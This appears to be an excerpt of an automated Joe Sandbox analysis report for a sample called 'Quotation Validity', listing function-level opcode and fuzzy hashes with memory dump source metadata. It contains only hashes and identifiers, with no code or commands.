                                                                                • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                • Instruction ID: e5170e85ea97b796418da9f84b7e01b9e4ab61450f174ecd7563a35259adcf27
                                                                                • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                • Instruction Fuzzy Hash: 49210236A00662B6DF15AB998C40BBFBB75EF60714FC0842FF65587661E634D990C3A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e59ec1bd13369911bec418edcfb816f6218a21b848a5a58befdacb1425f0534d
                                                                                • Instruction ID: 27de6722b284ed0241ed5885a4c26737a56f95512b052eb943045737c26812ef
                                                                                • Opcode Fuzzy Hash: e59ec1bd13369911bec418edcfb816f6218a21b848a5a58befdacb1425f0534d
                                                                                • Instruction Fuzzy Hash: 9431D435A0012C9BDB32DB28CC41FEE77BDEB15B48F0140B1E645A7294E674EE848F90
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                • Instruction ID: ecd414957e9956d4243f8645182e834072e2d386ac67cb0c12074915aef217d9
                                                                                • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                • Instruction Fuzzy Hash: 33218371A00609EFCB15CF58C980A8EBBB5FF48728F548469EE159F251D6B1EE05CB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                • Instruction ID: 7746127ed4c6a911f0ad6cbe8c1aaa75b5304c1fb185bf2b36c2f54929f52b19
                                                                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                • Instruction Fuzzy Hash: 57319C35600605EFD721CF68C884F6AB7B9EF45358F1085B9E5129B694E770EE06CB50
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 08c815d1ecc2462939e9cdcc67254948364254e2fbbad6da60ad4fec5fcb614a
                                                                                • Instruction ID: 9583cc38baa4c0a2ee1f376a4f07124670c17531fcbc7edba7b44325b4623fef
                                                                                • Opcode Fuzzy Hash: 08c815d1ecc2462939e9cdcc67254948364254e2fbbad6da60ad4fec5fcb614a
                                                                                • Instruction Fuzzy Hash: 1021D6715043159BCA21FB6C9944B17B7ECFB6465CF410826FA4497AB0EB30DD04CBA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                • Instruction ID: 0fd69c0c03a9f0e55c38b76d456b97708598d5d549d4ece6815d60750c558dd2
                                                                                • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                • Instruction Fuzzy Hash: 7F21CF722002059FDB19DF29C480B66BBEDEF85369F15816DE10ACB790EB74E801CB94
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8e965b60c57130777c381da14e52054c9b96f52a731689cd4c76ae9f2339689d
                                                                                • Instruction ID: 462ba46039fe655e1eda236ee42202505375d52d1cbab1bfe806de445de0240a
                                                                                • Opcode Fuzzy Hash: 8e965b60c57130777c381da14e52054c9b96f52a731689cd4c76ae9f2339689d
                                                                                • Instruction Fuzzy Hash: F7218B75600645ABD715DB6CC880A6AB7B8FF58748F144069FA04DB7A1E634ED40CB64
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9871a76a7fb4c0b234de680f7e6ad48906f3a0dda1b7ef8c340c4f624be406e3
                                                                                • Instruction ID: 02d149ccd5949d83a7ef0a30becd4677e736562730c73a9936986fb5b988c8c5
                                                                                • Opcode Fuzzy Hash: 9871a76a7fb4c0b234de680f7e6ad48906f3a0dda1b7ef8c340c4f624be406e3
                                                                                • Instruction Fuzzy Hash: 77212D31A047418BC321DF298440BABBBD9FFD5315F14491EF4A683265DB70A9478791
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4e9f394985e7204b255a505af796dbe690e2529a9f6edcb10902339398f17475
                                                                                • Instruction ID: 2bc68e5af37ab5fa7e10f4b8a0268f01d188db7c591897d8f91d86614fa7ee49
                                                                                • Opcode Fuzzy Hash: 4e9f394985e7204b255a505af796dbe690e2529a9f6edcb10902339398f17475
                                                                                • Instruction Fuzzy Hash: 0A21F5729043469FD715EFADC944F6BBBEDEF90648F08045ABE80C7262D730D909C6A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                • Instruction ID: 8cf9d863f9a492b5c80776acfa89357ff39b84eab7e19926faa820bad951b5c8
                                                                                • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                • Instruction Fuzzy Hash: FF21C272644715ABD3119F1CCC45B9BBBE4FB89768F10022AF9499B7E0D734E80087A9
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 978025a80af84a6e10dc1e7f0837bd51affee20cc8469256d2503e50ffecd3ef
                                                                                • Instruction ID: cb6c36a6282100593a3a145214cf431e5295d41ed0f72b877e8c9269edb00d13
                                                                                • Opcode Fuzzy Hash: 978025a80af84a6e10dc1e7f0837bd51affee20cc8469256d2503e50ffecd3ef
                                                                                • Instruction Fuzzy Hash: 81216876201B119BCB25DF29C901B56B7F5EF58B08F248468A509CBBA2E371E842CF94
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                • Instruction ID: 3eb0d41e5c849a7947cc1d04231c01f23e44184c28d6c7f34422e70149836240
                                                                                • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                • Instruction Fuzzy Hash: 6121F372604686DFEB229F6DDA44B217BE9AF4065CF0A00A1ED059B792E734DC40C650
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5091b5ebf5942e0dde0764b535bce3e5be2b070e72e14cec9cfa8d0f4197f5a2
                                                                                • Instruction ID: e7411f5136b65a5e87f50e5b7da0989150ba12afb79b1e147d362be5653e9dd3
                                                                                • Opcode Fuzzy Hash: 5091b5ebf5942e0dde0764b535bce3e5be2b070e72e14cec9cfa8d0f4197f5a2
                                                                                • Instruction Fuzzy Hash: EC01F732700609DBC714DB6ED8009AE77BDFF5461CF05806ADA01A7658EE30DD01C391
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5734c358e26c06c85b732488ea091990c69d80196d3efb9aabd95abd18a6d3b5
                                                                                • Instruction ID: dbaea67234c0386aca94a84522962c5940d5d215351ae9413741ad3581b36dfa
                                                                                • Opcode Fuzzy Hash: 5734c358e26c06c85b732488ea091990c69d80196d3efb9aabd95abd18a6d3b5
                                                                                • Instruction Fuzzy Hash: C5018F71A10258EBDB10EFA9D845FAFBBB8EF54704F404066FA01EB390E674DA05C794
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c22a14947a34d93a7a2e2cff7278d76075ba080e1583b430ddd6232128151040
                                                                                • Instruction ID: 3f3b18b387b3a2598a385a981658fd383e7fb6307bb76daba85dbbab618affdb
                                                                                • Opcode Fuzzy Hash: c22a14947a34d93a7a2e2cff7278d76075ba080e1583b430ddd6232128151040
                                                                                • Instruction Fuzzy Hash: 41F0A432641B21B7C7319B5ACD40F57BAAEEB84EA8F154029A605A7650DA34ED01DBA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7b5e30a1e6006dfbc2dff94d211efac6eab9358c14de646cace820eb7f6d8777
                                                                                • Instruction ID: 2903e89d26a5447a33f0310117581eaad0fdd6634cf26c75659a2fb2d6e0a96c
                                                                                • Opcode Fuzzy Hash: 7b5e30a1e6006dfbc2dff94d211efac6eab9358c14de646cace820eb7f6d8777
                                                                                • Instruction Fuzzy Hash: 1A012C71A10209ABDB00DFA9D9819EEBBF8FF58704F10405AEA01E7350E734EA018BA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 213d855adf0bd834e1c0e023a75c8b90942bfd53ba16b23f6a194c9555e6fc8e
                                                                                • Instruction ID: befb26600a9efffd89fb80edc28a017e64ab6580cea8ce4f8f606e6929d4fb3f
                                                                                • Opcode Fuzzy Hash: 213d855adf0bd834e1c0e023a75c8b90942bfd53ba16b23f6a194c9555e6fc8e
                                                                                • Instruction Fuzzy Hash: 530121B5A10219ABDB04DFA9D9819EEB7F8FF58704F10405AFA01E7351D634EA018BA5
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                • Instruction ID: 19ec69ee3c2be50d6f5c643f95d9d916456bf28ba8b49cfffe43339db65fa256
                                                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                • Instruction Fuzzy Hash: C7F0C2B2A00611ABD324CF4DDC40E57FBEADBD1A84F048128A609CB320EA31ED04CB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bcf50ee17b411aeff6498a0905335705bd1cd9cf991c755f50c7b20cf2c1978d
                                                                                • Instruction ID: 413b765215f30b900f981b34e6c4dda91247e1b65f5498091b108969ad955a41
                                                                                • Opcode Fuzzy Hash: bcf50ee17b411aeff6498a0905335705bd1cd9cf991c755f50c7b20cf2c1978d
                                                                                • Instruction Fuzzy Hash: 06012171A00209ABDB00DF69D9819DEB7F8FF58704F50405AFA01F7391E674E9018BA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                • Instruction ID: da2e7c111033d4e7e7e45ca7a3bc885cf70961ef9ccf5550b51964b45b0334a8
                                                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                • Instruction Fuzzy Hash: A6F0FC732046339BD733165D4840B6BB59D8FD1A6CF29D035E2499F60CC968CD0157E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 55d3ba3226304d7bfe35854e33f509906a7342d69fe68029400993ea59923efd
                                                                                • Instruction ID: b1971ea1039244f920bdb18c1a22eea2e0dadbec3dbed3e851ae4389be30a4fb
                                                                                • Opcode Fuzzy Hash: 55d3ba3226304d7bfe35854e33f509906a7342d69fe68029400993ea59923efd
                                                                                • Instruction Fuzzy Hash: 13111B70A1024ADFDB04DFA9D541BAEBBF4FF08704F04426AE509EB792E634D941CB94
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 07bfb02246cc1bd3f7e867b0364b8924a8394cba837d5ef20ba4c47c4e3e1abe
                                                                                • Instruction ID: e5eeb8db1ec5ccf9b69a98b937d3451674d2b3dd05321f0e2e09d5c475183009
                                                                                • Opcode Fuzzy Hash: 07bfb02246cc1bd3f7e867b0364b8924a8394cba837d5ef20ba4c47c4e3e1abe
                                                                                • Instruction Fuzzy Hash: D9017171A00259ABDB00DFA9D441ADEB7B4BF54714F14005AE501A7390E734EA01CB55
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8db6656b8bd7d9652accba79ae46f7de903da8435ff9f13d9e39e3b8f5bfc4d0
                                                                                • Instruction ID: 7d1d7f31167b0b24367e2a1be7cc47aaecea92ae5e99b40c09efbac3bf1fae35
                                                                                • Opcode Fuzzy Hash: 8db6656b8bd7d9652accba79ae46f7de903da8435ff9f13d9e39e3b8f5bfc4d0
                                                                                • Instruction Fuzzy Hash: 30F0C872B10358ABDB04DFBDC445AEEB7B8EF44714F408066E501E7390EA74DA058751
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                • Instruction ID: 3c672ca01430e46548443ccc1c843fd048d4a9bda5be3e07a901e03cade939f5
                                                                                • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                • Instruction Fuzzy Hash: 7CF02B71A01356AFFB20D7AD8980FEFBBA8DF90718F488555BE01D7140E631EA40C750
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 70acc11b02de32b3cc5dab0700437131bbd96fa371834dcd1945f53e5f1acc30
                                                                                • Instruction ID: b7ae0bab7dc17b335f92a456ea78374d9446f221fb43f79b9dd6e8ec4c1962cf
                                                                                • Opcode Fuzzy Hash: 70acc11b02de32b3cc5dab0700437131bbd96fa371834dcd1945f53e5f1acc30
                                                                                • Instruction Fuzzy Hash: 30F024B1204241DBF320971D8C01B2236DEEBC065CF25D06AEB498F6C5EA70EC41C394
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0e6e86b5b04be312e2fcbfc72fcfd44e91169ee1866e85a63a833733ecf78ab8
                                                                                • Instruction ID: 3da199ea277aee92abf575f1d69ecf2101fa0a460f860b386bd3173d5aae048f
                                                                                • Opcode Fuzzy Hash: 0e6e86b5b04be312e2fcbfc72fcfd44e91169ee1866e85a63a833733ecf78ab8
                                                                                • Instruction Fuzzy Hash: 1B011E70A0020ADFDB44DFA9D545B9EB7F4FF08304F148176E519EB391E6349A418B95
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be77137e802a19fb0c687ceee00ad00c0fb17fd833a155bcee410af2920c45d3
                                                                                • Instruction ID: e0c1c5aa0fdb68c8722dbfa7b2304266f950fdefce63a2e7d32585956b90584b
                                                                                • Opcode Fuzzy Hash: be77137e802a19fb0c687ceee00ad00c0fb17fd833a155bcee410af2920c45d3
                                                                                • Instruction Fuzzy Hash: 390181B0204785DBE7229B2CCD49B2537E8EB54B4CF8C4190FA41DBAE6E768E4018610
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                • Instruction ID: e8219f4a2ca34696ed528a7b84e3f0994e70344a95bd056c076dd95cc33e6fe0
                                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                • Instruction Fuzzy Hash: 2EF0E931341A1347EB36AB2E9420B2BA6559F90B10B0D052F9605CB7A4DF30D8118780
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9a7e4ccbb7f348e8fc32fb023e965ff1800d4bddcdbe282a3e00465c149887a8
                                                                                • Instruction ID: 2576fca0ab6654c30f54348940319544bfeec61eec20ae459055f8fb3b143aeb
                                                                                • Opcode Fuzzy Hash: 9a7e4ccbb7f348e8fc32fb023e965ff1800d4bddcdbe282a3e00465c149887a8
                                                                                • Instruction Fuzzy Hash: A2F08C70A00209AFCB04EFA8D545A9EB7F4EF18304F80406AF905EB391E674EA41CB54
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c86778b8b47c79a2c7536a567c2b67c250bb3068648320c625743768cc30ea4a
                                                                                • Instruction ID: 7a440faa97bbe18558aa70546367524277a2e05e65e51d2a8104b3b8874c8247
                                                                                • Opcode Fuzzy Hash: c86778b8b47c79a2c7536a567c2b67c250bb3068648320c625743768cc30ea4a
                                                                                • Instruction Fuzzy Hash: 1CF0FA32200340AFD732AB09CC04F9ABBFDEF84B08F28011DE542831A0CAB0E908C760
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4e19116961d1b9f92a7a2aac4f7bd34f252ab1d250cc325a48141b7f1aeefd62
                                                                                • Instruction ID: 451c09484b311ff1c8eb94954d34f8e2d399861ba9acabcb5dc4a6f02f09a8be
                                                                                • Opcode Fuzzy Hash: 4e19116961d1b9f92a7a2aac4f7bd34f252ab1d250cc325a48141b7f1aeefd62
                                                                                • Instruction Fuzzy Hash: 36F03C74A00249AFDB04EFA8D545A9EB7F4EF18704F10846AF909EB391E674EA00CB54
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 2289fc43ecc4c495ad1b226540be12ce4df8e2134baf23ee11ba9fa25a946f72
                                                                                • Instruction ID: 835369a6aae701867b161d783ec3257df0c58a2300d84a489cfc55b232d149be
                                                                                • Opcode Fuzzy Hash: 2289fc43ecc4c495ad1b226540be12ce4df8e2134baf23ee11ba9fa25a946f72
                                                                                • Instruction Fuzzy Hash: 2FE092721006549BC722FF2DDD01F8B77AAEB60768F114515F115571A0CA74BC10C784
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                • Instruction ID: 6ecefb84d56ce3e248c0e14b007b1cb82a0746af5deb4c0dfe6b29315ed439d8
                                                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                • Instruction Fuzzy Hash: 02D0C935312E80CFDB1BCB0CC5A4B1533A8BB44B48F810490F401CBF62D67CD944CA00
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                • Instruction ID: a40a50949c52329e231c3fe29f27fcece4e38c5c308fd9ed0297df05cd3d138c
                                                                                • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                • Instruction Fuzzy Hash: 77D01735941AC48FE72BCB08C165B507BF4F705B48F8910A9E1424BAA2C27C9984CB00
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                • Instruction ID: f6d8a059ef7475174c461f7d0565561fec4015fdbb01e384310e90b9de6644d6
                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                • Instruction Fuzzy Hash: EDD01236100248EFCB05DF55C890D9A772EFBD8710F548019FD19076108A31ED62DA50
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
